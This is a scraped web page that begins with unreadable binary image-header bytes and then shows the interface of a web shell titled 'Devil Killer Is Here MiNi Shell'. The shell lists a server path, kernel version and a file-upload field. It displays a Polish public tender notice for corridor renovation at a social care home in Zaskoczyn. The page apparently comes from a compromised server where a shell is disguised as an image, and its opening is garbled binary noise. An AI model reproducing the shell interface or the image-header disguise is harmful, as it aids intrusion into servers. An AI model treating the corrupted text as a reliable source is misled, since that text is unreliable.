JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220912/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220912/0034424501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont korytarza głównego i korytarza przy magazynkach żywnościowych na parterze budynku głównego w Domu Pomocy Społecznej &#34;Leśny&#34; w Zaskoczynie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">DOM POMOCY SPOŁECZNEJ &#34;LEŚNY&#34; W ZASKOCZYNIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000961509</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zaskoczyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">83-041</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">58 682-81-14</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">58 682-81-14 wew. 111</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dps.sekretariat@powiat-gdanski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.dps.powiat-gdanski.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> pomoc społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont korytarza głównego i korytarza przy magazynkach żywnościowych na parterze budynku głównego w Domu Pomocy Społecznej &#34;Leśny&#34; w Zaskoczynie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1591f86d-329f-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00344245</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00058895/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Remont korytarza głównego i korytarza przy magazynkach żywnościowych na parterze budynku głównego w domu Pomocy Społecznej &#34;Leśny&#34; w Zaskoczynie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest w<br/>języku polskim w formie elektronicznej za pośrednictwem Platformy zakupowej.<br/>2. Komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje,<br/>przekazywane winny być za pośrednictwem Platformy zakupowej za pomocą formularza „Wyślij wiadomość”.<br/>3. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwem Platformy zakupowej poprzez kliknięcie przycisku „Wyślij wiadomość” po których pojawi się komunikat, że<br/>wiadomość została wysłana do zamawiającego.<br/>4. Zamawiający dopuszcza, awaryjnie, komunikację za pośrednictwem poczty elektronicznej. Adres poczty elektronicznej osoby<br/>uprawnionej do kontaktu z Wykonawcami: dps.administracja@powiat-gdanski.pl<br/>5. Zamawiający będzie przekazywał wykonawcom informacje elektronicznie za pośrednictwem Platformy zakupowej. Informacje,<br/>zawiadomienia, zmiany, odpowiedzi - zamawiający będzie zamieszczał na Platformie zakupowej. Korespondencja, której zgodnie z<br/>obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana elektronicznie za pośrednictwem Platformy<br/>zakupowej do konkretnego wykonawcy.<br/>6. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na Platformie<br/>zakupowej przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do<br/>folderu SPAM.<br/>7. Zamawiający wskazuje niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie zakupowej, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) Platforma zakupowa działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>7) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>8. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1) akceptuje warunki korzystania z Platformy zakupowej określone w Regulaminie zamieszczonym na stronie internetowej<br/>https://platformazakupowa.pl/strona/1-regulamin oraz uznaje go za wiążący,<br/>2) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod adresem: https://platformazakupowa.pl/strona/45-<br/>instrukcje<br/>9. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z Platformy zakupowej<br/>w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert. Taka oferta<br/>zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ<br/>nie został spełniony obowiązek narzucony w art. 221 ustawy Pzp.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych jest Domem Pomocy Społecznej<br/>LEŚNY w Zaskoczynie, z siedzibą Zaskoczyn 11, 83-041 Mierzeszyn. Pozostałe nasze dane kontaktowe to:<br/>dps.sekretariat@powiat-gdanski.pl tel.58 682 81 14<br/>2. W sprawach związanych z Pani/Pana danymi osobowymi proszę kontaktować się z Inspektorem Ochrony Danych (IOD) pod<br/>adresem e-mai: piotr@aszyk.pl<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>3. Pani/Pana dane osobowe przetwarzane będą w celu przeprowadzenia postępowania i udzieleniu zamówienia, prowadzenia<br/>dokumentacji księgowo-podatkowej, archiwizacji danych, dochodzenia roszczeń lub obrony przed roszczeniami.<br/>4. Podstawą przetwarzania danych osobowych jest:<br/>1) ustawa z 11.9.2019 r. – Prawo zamówień publicznych;<br/>2) ustawa z 27.8.2009 r. o finansach publicznych;<br/>3) ustawa z 14.7.1983 r. o narodowym zasobie archiwalnym i archiwach;<br/>4) art. 6 pkt.1 lit. c RODO<br/>– przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze.<br/>5. Odbiorca lub kategorie odbiorców: podmioty upoważnione na podstawie zawartych umów powierzenia oraz uprawnione na mocy<br/>obowiązujących przepisów prawa, w szczególności osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania<br/>na podstawie art. 18 oraz art. 74–76 ustawy Pzp. Zasada jawności ma zastosowanie do wszystkich danych osobowych, z wyjątkiem<br/>danych, o których mowa w art. 9 ust. 1 RODO (szczególna kategoria danych).<br/>6. Pani/Pana dane osobowe będą przetwarzane przez okres niezbędny do realizacji celu przetwarzania oraz przez okres wynikający<br/>z przepisów w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu<br/>działania archiwów zakładowych, w szczególności zgodnie z art. 78 ust. 1 i 4 ustawy Pzp przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekracza 4 lata –<br/>przez cały okres obowiązywania umowy.<br/>7. Posiada Pani/Pan prawo:<br/>1) żądania dostępu do danych; w przypadku gdy wykonanie tego obowiązku, wymagałoby niewspółmiernie dużego wysiłku,<br/>zamawiający może, zgodnie z art. 75 ustawy Pzp, żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji<br/>mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia;<br/>2) żądania sprostowania lub uzupełnienia danych osobowych; zgodnie z art. 76 ustawy Pzp wykonanie tego obowiązku nie może<br/>naruszać integralności protokołu postępowania oraz jego załączników;<br/>3) usunięcia danych w przypadku, gdy dane osobowe nie są już niezbędne do celów, w których zostały zebrane, lub w inny sposób<br/>przetwarzane;<br/>4) żądania ograniczenia przetwarzania danych osobowych; zgodnie z art. 74 ust. 3 ustawy Pzp wykonanie tego obowiązku nie<br/>ogranicza przetwarzania danych osobowych do czasu zakończenie postępowania o udzielenie zamówienia.<br/>8. Przysługuje Pani/Pan prawo do wniesienia skargi do organu nadzorczego, tj. Urzędu Ochrony Danych Osobowych ul. Stawki 2,<br/>00-913 Warszawa.<br/>9. Pani/Pana dane osobowe nie będą poddawane zautomatyzowanemu podejmowaniu decyzji, w tym również profilowaniu.<br/>10. Pani/Pana dane osobowe nie będą przekazywane do państw trzecich.<br/>11. Podanie danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanych z udziałem w<br/>postępowaniu o udzielenie zamówienia; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>12. Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO<br/>względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które<br/>Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z<br/>wyłączeń, o których mowa w art. 14 ust. 5 RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DPS.281.2.2022.ZP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Podstawowe roboty związane z remontem:<br/>1. Roboty budowlane:<br/>· Zdemontować istniejącą stolarkę drzwiową dla drzwi wymienianych oraz drzwi z<br/>korytarza do korytarzyka bocznego;<br/>· Rozebrać okładzinę z glazury wykonaną do wysokości 200cm;<br/>· Rozebrać ścianki działowe określone do rozbiórki na rysunku nr 2 – Rzut<br/>str. 4<br/>budowlany;<br/>· Rozebrać okładziny posadzek;<br/>· Rozebrać szlichtę cementową;<br/>· Rozebrać izolację z papy;<br/>· Dostosować otwory drzwiowe do nowej stolarki;<br/>· Wykonać nadproże drzwiowe;<br/>· Wykonać izolację termiczną. Grubość styropianu dostosować do rzędnej posadzki<br/>na gotowo;<br/>· Wykonać szlichtę cementową zbrojoną siatką;<br/>· Wykonać ścianki działowe;<br/>· Uzupełnić tynki;<br/>· Wykonać gładź gipsową na suficie i ścianach;<br/>· Obłożyć ściany płytkami 60x30cm do wysokości 210cm;<br/>· Zamontować sufity podwieszane;<br/>· Wymalować ściany oraz sufit;<br/>· Ułożyć na posadzce płytki gresowe podłogowe 60x30cm;<br/>· Ułożyć wykładzinę termozgrzewalną PCV;<br/>2. Instalacje elektryczne<br/>· Zdemontować istniejące oprawy i osprzęt;<br/>· Zdemontować istniejącą instalację;<br/>· Wykonać nową instalację i zamontować osprzęt;<br/>3. Instalacje SSP<br/>· Rozbudować system o czujki optyczne podwieszone do sufitu podwieszanego<br/>oraz o wskaźniki zadziałania czujek osadzonych na suficie właściwym;<br/>· Zdemontować istni ponownie zamontować ROP-y, sygnalizatory<br/>4. Instalacja oświetlenia awaryjnego i ewakuacyjnego<br/>· Zdemontować istniejące oprawy;<br/>· Zdemontować oprawy zgodnie z rysunkiem nr 3 – Rzut sufitów;<br/>5. Instalacja TV dozoru i nagłośnienia<br/>· Zdemontować istniejącą kamerę i głośnik oraz ponownie zamontować po<br/>wykonani prac budowlanych; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45214220-8 - Roboty budowlane w zakresie szkół średnich</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <p class="mb-0">60100000-9 - Usługi w zakresie transportu drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się<br/>następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał<br/>spełnienie kryteriów: 1) Cena brutto wykonania zamówienia (PK1) - waga 60 %, 2) Doświadczenie<br/>zawodowe osób (PK2) - waga 30 %, 3) Okres gwarancji (PK3) - waga 10 %. Oferty będą oceniane<br/>przez komisję przetargową metodą punktową w skali 100-punktowej, przy czym 1 %= 1 pkt<br/>1) dla kryterium „Cena brutto wykonania zamówienia”: 2) dla kryterium „Doświadczenie zawodowe<br/>osób”:<br/>Sposób obliczenia:<br/>Pk2 - W kryterium „Doświadczenie zawodowe osób” Zamawiający dokona oceny doświadczenia osoby<br/>pełniącej funkcję kierownika robót branży elektrycznej (określonej w Rozdziale VIII. ust. 2 pkt 2 lit b)<br/>SWZ) ponad wymagania wskazane w warunkach udziału w niniejszym postępowaniu. Ocenie będzie<br/>podlegać jedynie doświadczenie osób wskazanych przez Wykonawcę w wykazie osób skierowanych<br/>przez Wykonawcę do realizacji zamówienia (załącznik nr 5 do SWZ).<br/>Wykonawca w celu uzyskania punktów w powyższym kryterium zobowiązany jest do wykazania<br/>wyższego/większego doświadczenia, ponad to wskazane w wykazie osób (załącznik nr 5 do SWZ), w<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>formularzu ofertowym w części dot. kryterium „doświadczenie zawodowe osób” (załącznik nr 1 do<br/>SWZ). Ocenie zostaną poddane tylko osoby wskazane przez Wykonawcę w wykazie osób (załącznik<br/>nr 5 do SWZ), które potwierdzają warunek dotyczący dysponowania przez Wykonawcę osobami<br/>zdolnymi do wykonania zamówienia. Nie dopuszcza się wskazania doświadczenia zawodowego innej<br/>osoby niż tej wskazanej w wykazie osób (załącznik nr 5 do SWZ) w celu potwierdzenia warunku<br/>udziału w postępowaniu.<br/>Zamawiający dokona oceny oferty w przedmiotowym kryterium w następujący sposób:<br/>a) Jeżeli Wykonawca wykaże, że skieruje do realizacji zamówienia publicznego osobę, która obejmie<br/>funkcję kierownika robót branży elektrycznej, posiadającą doświadczenie zawodowe nabyte przy<br/>pełnieniu funkcji kierownika robót branży elektrycznej lub inspektora nadzoru branży elektrycznej<br/>polegające na realizacji co najmniej dwóch inwestycji, które w swoim zakresie obejmowały wykonanie<br/>robót związanych z wykonaniem budowy, remontu lub przebudowy min. 1 pomieszczenia – oferta<br/>Wykonawcy otrzyma 10 pkt.<br/>b) Jeżeli Wykonawca wykaże, że skieruje do realizacji zamówienia publicznego osobę, która obejmie<br/>funkcję kierownika robót branży elektrycznej, posiadającą doświadczenie zawodowe nabyte przy<br/>pełnieniu funkcji kierownika robót branży elektrycznej lub inspektora nadzoru branży elektrycznej<br/>polegające na realizacji co najmniej trzech inwestycji, które w swoim zakresie obejmowały wykonanie<br/>robót związanych z wykonaniem budowy, remontu lub przebudowy min. 1 pomieszczenia – oferta<br/>Wykonawcy otrzyma 20 pkt.<br/>c) Jeżeli Wykonawca wykaże, że skieruje do realizacji zamówienia publicznego osobę, która obejmie<br/>funkcję kierownika robót branży elektrycznej, posiadającą doświadczenie zawodowe nabyte przy<br/>pełnieniu funkcji kierownika robót branży elektrycznej lub inspektora nadzoru branży elektrycznej<br/>polegające na realizacji co najmniej czterech inwestycji, które w swoim zakresie obejmowały<br/>wykonanie robót związanych z wykonaniem budowy, remontu lub przebudowy min. 1 pomieszczenia –oferta Wykonawcy otrzyma 30<br/>pkt.<br/>Pozostałe opisy kryteriów oceny ofert zostały opisane w Rozdz. XX. ust. 1 pkt 3) SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe osób</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.O udzielenie przedmiotowego zamówienia mogą się ubiegać wykonawcy, którzy spełniają warunki udziału w postępowaniu określone przez zamawiającego.<br/>2. Zamawiający wymaga spełnienia warunku udziału w postępowaniu, w zakresie zdolności technicznej lub zawodowej:<br/>1) Wykonawcy:<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że posiada wiedzę i doświadczenie, co należycie<br/>udokumentuje tj. wykaże, że w okresie ostatnich 5 lat licząc wstecz od dnia, w którym upływa (upłynął) termin składania ofert<br/>w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie oraz<br/>zgodnie z przepisami prawa budowlanego i prawidłowo ukończył co najmniej:<br/>– dwie roboty budowlane, w ramach których wykonany został remont obejmujący swym 